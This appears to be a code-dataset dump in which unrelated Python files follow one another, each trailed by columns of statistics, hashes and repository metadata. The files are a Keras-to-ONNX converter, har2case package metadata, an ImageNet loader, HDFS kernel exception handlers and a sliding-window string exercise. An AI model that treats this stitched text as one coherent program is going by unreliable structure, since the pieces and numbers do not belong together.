# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#

import os
import numpy as np
import argparse

import keras
import keras2onnx

if __name__ == "__main__":

    """
    Lightweight script to convert a keras model into an ONNX model
    """

    parser = argparse.ArgumentParser("Data Augmentation")
    parser.add_argument('keras_model_path', help="Path of the input keras model")
    parser.add_argument('onnx_model_path', help="Path of the output onnx model")
    parser.add_argument("--verify_with", help="Check the model by passing an input numpy path")
    args = parser.parse_args()

    # load the keras model
    model = keras.models.load_model(args.keras_model_path)
    model.summary()

    # do the conversion
    onnx_model = keras2onnx.convert_keras(model, model.name)

    # write to file
    with open(args.onnx_model_path, "wb") as file:
        file.write(onnx_model.SerializeToString())
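Based on the positional arguments defined above, a run of the script might look like the following; the model file names are placeholders:

# Example invocation (paths are placeholders):
#   python scripts/convert_keras2onnx.py my_model.h5 my_model.onnx
#
# Programmatic equivalent of what the script does, assuming keras and keras2onnx are installed:
import keras
import keras2onnx

model = keras.models.load_model("my_model.h5")            # placeholder input path
onnx_model = keras2onnx.convert_keras(model, model.name)  # convert the in-memory keras model
with open("my_model.onnx", "wb") as f:                    # placeholder output path
    f.write(onnx_model.SerializeToString())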
30.634146
95
0.72293
181
1,256
4.878453
0.524862
0.06795
0.057758
0.038505
0.04983
0.04983
0
0
0
0
0
0.009823
0.18949
1,256
40
96
31.4
0.857564
0.33121
0
0
0
0
0.233957
0
0
0
0
0
0
1
0
false
0.058824
0.294118
0
0.294118
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc6d62eed45d350cb72c202ceedfb98394117cd4
315
py
Python
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
__title__ = 'har2case'
__description__ = 'Convert HAR(HTTP Archive) to YAML/JSON testcases for HttpRunner.'
__url__ = 'https://github.com/HttpRunner/har2case'
__version__ = '0.2.0'
__author__ = 'debugtalk'
__author_email__ = '[email protected]'
__license__ = 'Apache-2.0'
__copyright__ = 'Copyright 2017 debugtalk'
39.375
84
0.771429
38
315
5.526316
0.736842
0.019048
0
0
0
0
0
0
0
0
0
0.038869
0.101587
315
8
85
39.375
0.70318
0
0
0
0
0
0.556962
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc7fb355e0004487d0ead15c251476f2cd39193b
2,658
py
Python
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
9
2021-03-30T20:43:26.000Z
2021-12-28T06:25:17.000Z
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
null
null
null
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
2
2021-03-31T01:19:48.000Z
2021-08-02T13:41:32.000Z
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

import concurrent.futures
import numpy as np
import os
from PIL import Image
import torchvision

from datasets import base
from platforms.platform import get_platform


def _get_samples(root, y_name, y_num):
    y_dir = os.path.join(root, y_name)
    if not get_platform().isdir(y_dir):
        return []
    output = [(os.path.join(y_dir, f), y_num)
              for f in get_platform().listdir(y_dir) if f.lower().endswith('jpeg')]
    return output


class Dataset(base.ImageDataset):
    """ImageNet"""

    def __init__(self, loc: str, image_transforms):
        # Load the data.
        classes = sorted(get_platform().listdir(loc))
        samples = []

        if get_platform().num_workers > 0:
            executor = concurrent.futures.ThreadPoolExecutor(max_workers=get_platform().num_workers)
            futures = [executor.submit(_get_samples, loc, y_name, y_num)
                       for y_num, y_name in enumerate(classes)]
            for d in concurrent.futures.wait(futures)[0]:
                samples += d.result()
        else:
            for y_num, y_name in enumerate(classes):
                samples += _get_samples(loc, y_name, y_num)

        examples, labels = zip(*samples)
        super(Dataset, self).__init__(
            np.array(examples), np.array(labels), image_transforms,
            [torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])

    @staticmethod
    def num_train_examples():
        return 1281167

    @staticmethod
    def num_test_examples():
        return 50000

    @staticmethod
    def num_classes():
        return 1000

    @staticmethod
    def _augment_transforms():
        return [
            torchvision.transforms.RandomResizedCrop(224, scale=(0.1, 1.0), ratio=(0.8, 1.25)),
            torchvision.transforms.RandomHorizontalFlip()
        ]

    @staticmethod
    def _transforms():
        return [torchvision.transforms.Resize(256), torchvision.transforms.CenterCrop(224)]

    @staticmethod
    def get_train_set(use_augmentation, resize):
        transforms = Dataset._augment_transforms() if use_augmentation else Dataset._transforms()
        return Dataset(os.path.join(get_platform().imagenet_root, 'train'), transforms)

    @staticmethod
    def get_test_set(resize):
        return Dataset(os.path.join(get_platform().imagenet_root, 'val'), Dataset._transforms())

    @staticmethod
    def example_to_image(example):
        with get_platform().open(example, 'rb') as fp:
            return Image.open(fp).convert('RGB')


DataLoader = base.DataLoader
33.225
115
0.677201
341
2,658
5.085044
0.363636
0.057093
0.023068
0.015571
0.113033
0.113033
0.113033
0.087659
0.053057
0
0
0.028612
0.211061
2,658
79
116
33.64557
0.798283
0.072611
0
0.148148
0
0
0.006922
0
0
0
0
0
0
1
0.185185
false
0
0.12963
0.111111
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc8903dace15225a2f4484e8807d8da8761b6a96
2,761
py
Python
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
3
2019-10-28T02:52:46.000Z
2019-12-24T09:11:48.000Z
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
#!/usr/bin/env python
# -*- coding=utf-8 -*-
#
# Author: huangnj
# Time: 2019/09/27

import traceback
from functools import wraps
from hdfs_kernel.constants import EXPECTED_ERROR_MSG, INTERNAL_ERROR_MSG
from hdfs.util import HdfsError


# == EXCEPTIONS ==
class SessionManagementException(Exception):
    pass


class CommandNotAllowedException(Exception):
    pass


class CommandExecuteException(Exception):
    pass


# option parse Error
class OptionParsingError(RuntimeError):
    pass


class OptionParsingExit(Exception):
    def __init__(self, status, msg):
        self.msg = msg
        self.status = status


# == DECORATORS FOR EXCEPTION HANDLING ==
EXPECTED_EXCEPTIONS = [HdfsError, SessionManagementException, CommandNotAllowedException,
                       CommandExecuteException, OptionParsingExit, OptionParsingError]


def handle_expected_exceptions(f):
    """A decorator that handles expected exceptions. Self can be any object with
    an "ipython_display" attribute.
    Usage:
    @handle_expected_exceptions
    def fn(self, ...):
        etc..."""
    exceptions_to_handle = tuple(EXPECTED_EXCEPTIONS)

    # Notice that we're NOT handling e.DataFrameParseException here. That's because DataFrameParseException
    # is an internal error that suggests something is wrong with LivyClientLib's implementation.
    @wraps(f)
    def wrapped(self, *args, **kwargs):
        try:
            out = f(self, *args, **kwargs)
        except exceptions_to_handle as err:
            # Do not log! Some messages may contain private client information.
            self.send_error(EXPECTED_ERROR_MSG.format(err))
            return None
        else:
            return out
    return wrapped


def wrap_unexpected_exceptions(f, execute_if_error=None):
    """A decorator that catches all exceptions from the function f and alerts the user about them.
    Self can be any object with a "logger" attribute and an "ipython_display" attribute.
    All exceptions are logged as "unexpected" exceptions, and a request is made to the user to file an issue
    at the Github repository. If there is an error, returns None if execute_if_error is None, or else
    returns the output of the function execute_if_error.
    Usage:
    @wrap_unexpected_exceptions
    def fn(self, ...):
        ..etc"""
    @wraps(f)
    def wrapped(self, *args, **kwargs):
        try:
            out = f(self, *args, **kwargs)
        except Exception as e:
            self.logger.error(u"ENCOUNTERED AN INTERNAL ERROR: {}\n\tTraceback:\n{}".format(e, traceback.format_exc()))
            self.send_error(INTERNAL_ERROR_MSG.format(e))
            return None if execute_if_error is None else execute_if_error()
        else:
            return out
    return wrapped
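A sketch of how these decorators are meant to be applied, following the usage notes in the docstrings. The class below is a stand-in, not part of hdfs_kernel; it only shows the contract the decorators rely on (a send_error() method for handle_expected_exceptions, plus a logger attribute for wrap_unexpected_exceptions):

# Illustrative sketch only; assumes the module above is importable as hdfs_kernel.exceptions.
import logging
from hdfs_kernel.exceptions import handle_expected_exceptions, CommandNotAllowedException

class FakeKernelHandler:
    def __init__(self):
        self.logger = logging.getLogger(__name__)

    def send_error(self, message):
        # Stand-in for however the real kernel surfaces errors to the user.
        print(message)

    @handle_expected_exceptions
    def run_command(self, command):
        if not command:
            raise CommandNotAllowedException("empty command")
        return "ok"

handler = FakeKernelHandler()
print(handler.run_command("ls /"))  # prints "ok"
handler.run_command("")             # exception is caught and reported via send_error, returns None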
32.482353
119
0.694314
339
2,761
5.530973
0.40118
0.048
0.037333
0.0128
0.1632
0.112
0.088533
0.0608
0.0608
0.0608
0
0.004212
0.226005
2,761
84
120
32.869048
0.873187
0.3908
0
0.428571
0
0
0.031697
0
0
0
0
0
0
1
0.119048
false
0.095238
0.095238
0
0.47619
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc992600a7f421e186b8dbe2ed6b420847313d4c
1,473
py
Python
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
#######################################################################################################################
# Given a string, find the length of the longest substring which has no repeating characters.
#
# Input: String="aabccbb"
# Output: 3
# Explanation: The longest substring without any repeating characters is "abc".
#
# Input: String="abbbb"
# Output: 2
# Explanation: The longest substring without any repeating characters is "ab".
#
# Input: String="abccde"
# Output: 3
# Explanation: Longest substrings without any repeating characters are "abc" & "cde".
#######################################################################################################################
def longest_substring_no_repeating_char(input_str: str) -> int:
    window_start = 0
    is_present = [None for i in range(26)]  # last index seen for each lowercase letter
    max_window = 0
    for i in range(len(input_str)):
        char_ord = ord(input_str[i]) - 97
        if is_present[char_ord] is not None:
            # Shrink the window so it starts just past the previous occurrence.
            window_start = max(window_start, is_present[char_ord] + 1)
        is_present[char_ord] = i
        max_window = max(max_window, i - window_start + 1)
    return max_window


print(longest_substring_no_repeating_char('aabccbb'))
print(longest_substring_no_repeating_char('abbbb'))
print(longest_substring_no_repeating_char('abccde'))
print(longest_substring_no_repeating_char('abcabcbb'))
print(longest_substring_no_repeating_char('bbbbb'))
print(longest_substring_no_repeating_char('pwwkew'))
40.916667
119
0.620502
175
1,473
4.954286
0.32
0.184544
0.145329
0.217993
0.425606
0.38985
0.140715
0.140715
0.140715
0
0
0.008621
0.133741
1,473
35
120
42.085714
0.670846
0.291242
0
0
0
0
0.046717
0
0
0
0
0
0
1
0.058824
false
0
0
0
0.117647
0.352941
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1